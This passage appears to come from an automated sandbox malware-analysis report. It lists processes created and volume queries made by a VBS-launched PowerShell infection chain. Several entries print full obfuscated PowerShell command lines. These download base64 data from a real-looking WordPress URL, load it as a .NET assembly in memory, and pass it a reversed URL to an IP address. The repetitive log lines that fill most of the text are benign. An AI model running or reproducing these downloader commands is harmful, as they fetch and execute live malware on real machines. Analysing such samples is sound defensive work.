dqbv ge kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 mqbt eq lwbt fy tgbf c8 egby ge tq v gc zqbs c8 awbh fq lw 5 dy mq u dm mw y c4 mg w di lg x dk lw v do c b0 hq a n c l g cq dwbp gg b b2 c l g cc xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf c0 lq t c0 lq t c0 lq t c0 lq t c0 jw s c j bz he yqbh go l g cc mq n cw i n fi bwbk ge jw g ck kq 7 ==';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'c:\users\user\appdata\local\temp\sostener.vbs';[byte[]] $nnuoa = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nnuoa).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.1sd/svne/zram/ger/kat/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bz he yqbh go i 9 c jw w de mw n ds j b3 gk a bs hy i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu g4 dqbv ge i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu g4 dqbv ge kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 mqbt eq lwbt fy tgbf c8 egby ge tq v gc zqbs c8 awbh fq lw 5 dy mq u dm mw y c4 mg w di lg x dk lw v do c b0 hq a n c l g cq dwbp gg b b2 c l g cc xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf c0 lq t c0 lq t c0 lq t c0 lq t c0 jw s c j bz he yqbh go l g cc mq n cw i n fi bwbk ge jw g ck kq 7 ==';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\sostener.vbs');powershell $kbyhl;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'c:\users\user\desktop\sostener.vbs';[byte[]] $nnuoa = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nnuoa).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.1sd/svne/zram/ger/kat/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'roda' ));"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bz he yqbh go i 9 c jw w de mw n ds j b3 gk a bs hy i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu g4 dqbv ge i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu g4 dqbv ge kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 mqbt eq lwbt fy tgbf c8 egby ge tq v gc zqbs c8 awbh fq lw 5 dy mq u dm mw y c4 mg w di lg x dk lw v do c b0 hq a n c l g cq dwbp gg b b2 c l g cc xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf c0 lq t c0 lq t c0 lq t c0 lq t c0 jw s c j bz he yqbh go l g cc mq n cw i n fi bwbk ge jw g ck kq 7 ==';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'c:\users\user\appdata\local\temp\sostener.vbs';[byte[]] $nnuoa = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nnuoa).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.1sd/svne/zram/ger/kat/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bz he yqbh go i 9 c jw w de mw n ds j b3 gk a bs hy i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu g4 dqbv ge i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu g4 dqbv ge kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 mqbt eq lwbt fy tgbf c8 egby ge tq v gc zqbs c8 awbh fq lw 5 dy mq u dm mw y c4 mg w di lg x dk lw v do c b0 hq a n c l g cq dwbp gg b b2 c l g cc xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf c0 lq t c0 lq t c0 lq t c0 lq t c0 jw s c j bz he yqbh go l g cc mq n cw i n fi bwbk ge jw g ck kq 7 ==';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'c:\users\user\appdata\local\temp\sostener.vbs';[byte[]] $nnuoa = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nnuoa).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.1sd/svne/zram/ger/kat/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
